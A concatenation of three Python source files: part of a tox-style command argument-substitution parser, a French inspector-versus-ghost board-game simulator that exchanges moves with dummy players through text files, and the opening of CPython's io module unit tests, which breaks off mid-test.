if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
exo1.py
|
from random import shuffle,randrange
from time import sleep
from threading import Thread
import dummy0, dummy1
latence = 0.001
permanents, deux, avant, apres = {'rose'}, {'rouge','gris','bleu'}, {'violet','marron'}, {'noir','blanc'}
couleurs = avant | permanents | apres | deux
passages = [{1,4},{0,2},{1,3},{2,7},{0,5,8},{4,6},{5,7},{3,6,9},{4,9},{7,8}]
pass_ext = [{1,4},{0,2,5,7},{1,3,6},{2,7},{0,5,8,9},{4,6,1,8},{5,7,2,9},{3,6,9,1},{4,9,5},{7,8,4,6}]
def message(texte,jos):
for j in jos:
f = open("./"+str(j.numero)+"/infos.txt","a")
f.write(texte + "\n")
f.close()
def informer(texte):
message(texte,joueurs)
def demander(q,j):
informer("QUESTION : "+q)
f = open("./"+str(j.numero)+"/questions"+".txt","w")
f.write(q)
f.close()
sleep(latence)
f = open("./"+str(j.numero)+"/reponses"+".txt","r")
r = f.read()
f.close()
informer("REPONSE DONNEE : "+r)
return r
class personnage:
def __init__(self,couleur):
self.couleur, self.suspect, self.position, self.pouvoir = couleur, True, 0, True
def __repr__(self):
susp = "-suspect" if self.suspect else "-clean"
return self.couleur + "-" + str(self.position) + susp
class joueur:
def __init__(self,n):
self.numero = n
self.role = "l'inspecteur" if n == 0 else "le fantome"
def jouer(self,party):
informer("****\n Tour de "+self.role)
p = self.selectionner(party.tuiles_actives)
avec = self.activer_pouvoir(p,party,avant|deux)
self.bouger(p,avec,party.bloque)
self.activer_pouvoir(p,party,apres|deux)
def selectionner(self,t):
w = demander("Tuiles disponibles : " + str(t) + " choisir entre 0 et " + str(len(t)-1),self)
i = int(w) if w.isnumeric() and int(w) in range(len(t)) else 0
p = t[i]
informer("REPONSE INTERPRETEE : "+str(p))
informer(self.role + " joue " + p.couleur)
del t[i]
return p
def activer_pouvoir(self,p,party,activables):
if p.pouvoir and p.couleur in activables:
a = demander("Voulez-vous activer le pouvoir (0/1) ?",self) == "1"
informer("REPONSE INTERPRETEE : "+str(a==1))
if a :
informer("Pouvoir de " + p.couleur + " activé")
p.pouvoir = False
if p.couleur == "rouge":
draw = party.cartes[0]
informer(str(draw) + " a été tiré")
if draw == "fantome":
party.start += -1 if self.numero == 0 else 1
elif self.numero == 0:
draw.suspect = False
del party.cartes[0]
if p.couleur == "noir":
for q in party.personnages:
if q.position in {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque} :
q.position = p.position
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "blanc":
for q in party.personnages:
if q.position == p.position and p != q:
dispo = {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque}
w = demander(str(q) + ", positions disponibles : " + str(dispo) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in dispo else dispo.pop()
informer("REPONSE INTERPRETEE : "+str(x))
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "violet":
informer("Rappel des positions :\n" + str(party))
co = demander("Avec quelle couleur échanger (pas violet!) ?",self)
if co not in couleurs:
co = "rose"
informer("REPONSE INTERPRETEE : "+co)
q = [x for x in party.personnages if x.couleur == co][0]
p.position, q.position = q.position, p.position
informer("NOUVEAU PLACEMENT : "+str(p))
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "marron":
return [q for q in party.personnages if p.position == q.position]
if p.couleur == "gris":
w = demander("Quelle salle obscurcir ? (0-9)",self)
party.shadow = int(w) if w.isnumeric() and int(w) in range(10) else 0
informer("REPONSE INTERPRETEE : "+str(party.shadow))
if p.couleur == "bleu":
w = demander("Quelle salle bloquer ? (0-9)",self)
x = int(w) if w.isnumeric() and int(w) in range(10) else 0
w = demander("Quelle sortie ? Chosir parmi : "+str(passages[x]),self)
y = int(w) if w.isnumeric() and int(w) in passages[x] else passages[x].copy().pop()
informer("REPONSE INTERPRETEE : "+str({x,y}))
party.bloque = {x,y}
return [p]
def bouger(self,p,avec,bloque):
pass_act = pass_ext if p.couleur == 'rose' else passages
if p.couleur != 'violet' or p.pouvoir:
disp = {x for x in pass_act[p.position] if p.position not in bloque or x not in bloque}
w = demander("positions disponibles : " + str(disp) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in disp else disp.pop()
informer("REPONSE INTERPRETEE : "+str(x))
for q in avec:
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
class partie:
def __init__(self,joueurs):
for i in [0,1]:
f = open("./"+str(i)+"/infos"+".txt","w")
f.write("")
f.close()
self.joueurs = joueurs
self.start, self.end, self.num_tour, self.shadow, x = 4, 22, 1, randrange(10), randrange(10)
self.bloque = {x,passages[x].copy().pop()}
self.personnages = {personnage(c) for c in couleurs}
self.tuiles = [p for p in self.personnages]
self.cartes = self.tuiles[:]
self.fantome = self.cartes[randrange(8)]
message("!!! Le fantôme est : "+self.fantome.couleur,[self.joueurs[0]])
self.cartes.remove(self.fantome)
self.cartes += ['fantome']*3
shuffle(self.tuiles)
shuffle(self.cartes)
for i,p in enumerate(self.tuiles):
p.position = i
def actions(self):
joueur_actif = self.num_tour % 2
if joueur_actif == 1:
shuffle(self.tuiles)
self.tuiles_actives = self.tuiles[:4]
else:
self.tuiles_actives = self.tuiles[4:]
for i in [joueur_actif,1-joueur_actif,1-joueur_actif,joueur_actif]:
self.joueurs[i].jouer(self)
def lumiere(self):
partition = [{p for p in self.personnages if p.position == i} for i in range(10)]
if len(partition[self.fantome.position]) == 1 or self.fantome.position == self.shadow:
informer("le fantome frappe")
self.start += 1
for piece,gens in enumerate(partition):
if len(gens) > 1 and piece != self.shadow:
for p in gens:
p.suspect = False
else:
informer("pas de cri")
for piece,gens in enumerate(partition):
if len(gens) == 1 or piece == self.shadow:
for p in gens:
p.suspect = False
self.start += len([p for p in self.personnages if p.suspect])
def tour(self):
informer("**************************\n" + str(self))
self.actions()
self.lumiere()
for p in self.personnages:
p.pouvoir = True
self.num_tour += 1
def lancer(self):
while self.start < self.end and len([p for p in self.personnages if p.suspect]) > 1:
self.tour()
informer("L'enquêteur a trouvé - c'était " + str(self.fantome) if self.start < self.end else "Le fantôme a gagné")
informer("Score final : "+str(self.end-self.start))
return self.end-self.start
def __repr__(self):
return "Tour:" + str(self.num_tour) + ", Score:"+str(self.start)+"/"+str(self.end) + ", Ombre:" + str(self.shadow) + ", Bloque:" + str(self.bloque) +"\n" + " ".join([str(p) for p in self.personnages])
score = []
joueurs = [joueur(0),joueur(1)]
nbparties = 1000
for i in range(nbparties):
t1,t2 = Thread(target=dummy0.lancer), Thread(target=dummy1.lancer)
t1.start()
t2.start()
score.append(partie(joueurs).lancer())
t1.join()
t2.join()
victoires = [x for x in score if x<=0]
print("Efficacité : "+str(len(victoires)/nbparties*100)+"%")
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
